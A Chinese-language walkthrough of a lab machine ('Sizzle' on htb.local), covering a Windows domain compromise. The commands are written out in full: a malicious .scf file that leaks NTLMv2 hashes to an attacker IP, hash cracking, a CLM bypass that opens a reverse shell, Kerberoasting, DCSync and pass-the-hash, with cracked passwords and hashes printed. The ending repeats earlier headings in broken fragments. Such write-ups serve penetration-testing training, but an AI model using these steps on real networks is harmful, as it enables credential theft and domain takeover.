Windows域渗透实战：从NTLM窃取到DCSync权限提升<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描与识别<\/h3>
使用Nmap进行全端口扫描：<\/p>
nmap -p- 10.10.10.103 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>关键发现：<\/p>

21\/tcp: 匿名FTP登录允许<\/li>
80\/tcp: Microsoft IIS 10.0<\/li>
443\/tcp: SSL证书显示域名为sizzle.htb.local<\/li>
445\/tcp: SMB服务<\/li>
636\/tcp: SSL\/LDAP (Active Directory)<\/li>
5985\/tcp: WinRM服务<\/li>
5986\/tcp: SSL\/WinRM服务<\/li>
<\/ul>
1.2 SMB枚举<\/h3>
尝试枚举SMB共享：<\/p>
smbclient -N -L \\\\<\/span>10.10.10.103
<\/span><\/span><\/code><\/pre>发现"Department Shares"共享可访问：<\/p>
mkdir -p \/mnt\/10.10.10.103
<\/span><\/span>mount -t cifs "\/\/10.10.10.103\/Department Shares"<\/span> \/mnt\/10.10.10.103
<\/span><\/span><\/code><\/pre>2. 初始访问：NTLMv2哈希窃取<\/h2>
2.1 利用.scf文件窃取NTLMv2哈希<\/h3>
在Public共享创建恶意.scf文件：<\/p>
[Shell]
Command=2
IconFile=\\10.10.16.12\icon
<\/code><\/pre>
启动Responder捕获哈希：<\/p>
sudo responder -I tun0
<\/span><\/span><\/code><\/pre>捕获到的NTLMv2哈希示例：<\/p>
amanda::HTB:d3f7c7ba82bc852e:5303E82C9CC3D2753D1223C5C2A7208F:0101000000000000001630CD5311DB016FCA8DB03406550300000000020008004E0037004800560001001E00570049004E002D00580031004A00310047003300470048004C0038004E0004003400570049004E002D00580031004A00310047003300470048004C0038004E002E004E003700480056002E004C004F00430041004C00030014004E003700480056002E004C004F00430041004C00050014004E003700480056002E004C004F00430041004C0007000800001630CD5311DB0106000400020000000800300030000000000000000100000000200000AA6C757924875383D823CFA4AAE98627AFED9C1B8258F7B1597CADE1C5EAC1E80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003200000000000000000000000000
<\/code><\/pre>
2.2 破解NTLMv2哈希<\/h3>
使用Hashcat破解：<\/p>
hashcat -m 5600<\/span> -a 0<\/span> hash \/usr\/share\/wordlists\/rockyou.txt --force
<\/span><\/span><\/code><\/pre>成功破解出密码：Ashare1972<\/code><\/p>
3. 横向移动：AD CS证书服务利用<\/h2>
3.1 访问证书注册Web服务<\/h3>
URL: https:\/\/10.10.10.103\/certsrv\/<\/code>

凭据: amanda\/Ashare1972<\/p>
3.2 生成证书请求<\/h3>
生成RSA私钥和CSR：<\/p>
openssl genrsa -des3 -out amanda.key 2048<\/span>
<\/span><\/span>openssl req -new -key amanda.key -out amanda.csr
<\/span><\/span><\/code><\/pre>提交CSR到证书服务并下载base64编码的证书。<\/p>
3.3 转换为PFX格式<\/h3>
openssl pkcs12 -in amanda.crt -inkey amanda.key -out amanda.pfx
<\/span><\/span><\/code><\/pre>4. 绕过受限语言模式(CLM)<\/h2>
4.1 检查PowerShell语言模式<\/h3>
$executioncontext.sessionstate.languagemode
<\/span><\/span><\/code><\/pre>4.2 使用PSByPassCLM绕过限制<\/h3>
下载并执行PSByPassCLM：<\/p>
copy \/\/10.10.16.12\/share\/PsBypassCLM.exe .\/
<\/span><\/span>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe \/logfile= \/LogToConsole=true \/U \/revshell=true \/rhost=10.10.16.12 \/rport=10017 \users\amanda\Documents\PsBypassCLM.exe
<\/span><\/span><\/code><\/pre>5. Kerberoasting攻击<\/h2>
5.1 使用Rubeus进行Kerberoasting<\/h3>
.\Rubeus.exe kerberoast \/creduser:<\/span>htb.local\amanda \/credpassword:<\/span>Ashare1972
<\/span><\/span><\/code><\/pre>捕获到的TGS示例：<\/p>
$krb5tgs$23$*mrlky$HTB.LOCAL$http\/sizzle@HTB.LOCAL*$1DD276F5FB0297F4BB3A69DCE2EA94A3$3BE6F93528230B53E00CAEF4ED763ACD399159A2F56F5C0EC0C301088F74CECD9B1FBA96E10423C1210555A27CAEA15F0BF590E79B149500AD3E3233514BD4E4654B8473BF4E99FCF24933967A2A3FA0C62A97EA2FE672D714B8AC9A68429D7F308AE6ACFA93A1307B262F526FEF2E25E9569F9FAD9F034D674FD7949263DD7DBF31D189275CCF0DE6202FA3B6A35C280F4E2572DF7497B75CAD32D0291E637DDD10BF5506D1E766EF01A1021487DE75218FB5B23CE6FA762DC7794763A02F5C0CF7132A7D2FBA2C4AB415ECA9E836075445B067CD852725F2C6294666C0EF2C3E361D028D2D73FD993B6C89175D9F6ADAE0D367A5E80F86E03864350788B1DCBFDF3DF593B159346DEBD2EDC594BA232B7A6D7EC190D273E05D3018DA482068964F871469E028763FC40E937855F897349E29D0DA3AEB3E88CE5429F53BCA5F63CFB2DC25F050C2AB63BA947DA617C4014A837BBE6A5FDFC8504FC089CAEB321C8FE219540FB3DA66460D61098FBEFE0B86EE650B29C2C5CCFC13A9BF1D3508846942B8A1D187A1C861AF3303BE7C719B3423464CACAABC30AAAFD605618B68440D25F2427CF7CAD854F658EDCDF33E18F5C9C7B6166DC9E5DA6884B9B5A810D1CFA7B7BE5F8BCFA9E9F125B4375F7962871BF02E8BC281AF9D68324DFE4DE02375C67E0FC343E76202B5BA00F6FD6F1BEC8EDBE685DF26C14A3D9D2E0824A14C37F8BAA0A33F70893A63EC2ECAB55D559FF42355F415623E5ABAA34847E57499D296D69FF0AFFBE15141B42DD1817B5D0B437597A735A8B6A10B98417A1D9144D68D48B81F8BDCA89D0F4739B25629EBAE0EBAD35276C2E64D293067DF9F6434FEB1E31CB6675AE22F5D952D38FD07550FB54FD7B601977E4AA16A964714807D38B9FCFD3A88126C3B3029A812B577210B47A605BB17394F51DAEFD00D60304768ABD8ED1F1936251116C93CD2514FFCA03628B9F866E94A08EC6CECEF573EED39FE161C8354891E12CC195E1B02E731C3B03E58E2C4FBD72F6371E2915033D56B885C46065122B41BF9F4DB25A17AF64F0AC62F20E68625D8B39024AFF24EFE8B54EDDC5BA336DC84C4A2FFE11CC7DBB863D76791DCEDD2811AA6048E4C0B94B2D30BF1BB5FA2163CB76285A841BB08E6ED9CE740D12C9F35877969FA8DF6D27C08EC26E5B4E7D6F2AEC9E82DF347D180380425DCBD6781E8EAC8F3AC3CFE54C18A972C893C1893EFBDFDEE49465F72C7ED78C71E1217104D214C2E92B0CBC40DB06FBB7DE6BC80BA2839E5F0C431D4152AB4C2A02E538935FD08B5D304FC8D84E722F66644BD0659F99FAF78CEEDCA443132CCF9B792AEF02B473B4D7A6AB9E945585BB
<\/code><\/pre>
5.2 破解Kerberos票据<\/h3>
hashcat -m 13100<\/span> -a 0<\/span> tgt \/usr\/share\/wordlists\/rockyou.txt --force
<\/span><\/span><\/code><\/pre>成功破解出密码：Football#7<\/code><\/p>
6. 权限提升：DCSync攻击<\/h2>
6.1 使用Impacket进行DCSync<\/h3>
impacket-secretsdump -just-dc mrlky:Football#7@10.10.10.103
<\/span><\/span><\/code><\/pre>6.2 获取域管理员哈希<\/h3>
示例输出：<\/p>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:336d863559a3f7e69371a85ad959a675:::
<\/code><\/pre>
6.3 使用哈希传递攻击<\/h3>
impacket-psexec administrator@10.10.10.103 -hashes 336d863559a3f7e69371a85ad959a675:f6b7160bfc91823792e0ac3a162c9267
<\/span><\/span><\/code><\/pre>7. 获取标志<\/h2>

用户标志：142f5652463ac38124e3adf5a1b5f402<\/li>
管理员标志：07b28721aa122e7bfcd54ab1dc06c57a<\/li>
<\/ul>
关键知识点总结<\/h2>

NTLMv2哈希窃取<\/strong>：通过.scf文件中的恶意IconFile路径触发SMB认证请求<\/li>
AD CS证书服务利用<\/strong>：通过证书注册Web服务获取用户证书，用于身份验证<\/li>
受限语言模式绕过<\/strong>：使用PSByPassCLM等技术绕过PowerShell的安全限制<\/li>
Kerberoasting攻击<\/strong>：获取服务账户的TGS票据并离线破解<\/li>
DCSync攻击<\/strong>：模拟域控制器行为获取域内所有用户的密码哈希<\/li>
哈希传递攻击<\/strong>：使用NTLM哈希直接获取系统权限<\/li>
<\/ol>
Windows域渗透实战：从NTLM窃取到DCSync权限提升<\/h1>

1. 信息收集阶段<\/h2>

2. 初始访问：NTLMv2哈希窃取<\/h2>

3.1 访问证书注册Web服务<\/h3> URL: https:\/\/10.10.10.103\/certsrv\/<\/code> 凭据: amanda\/Ashare1972<\/p>

4. 绕过受限语言模式(CLM)<\/h2>

5. Kerberoasting攻击<\/h2>

3.1 访问证书注册Web服务<\/h3>
URL: `https:\/\/10.10.10.103\/certsrv\/<\/code> 凭据: amanda\/Ashare1972<\/p>`
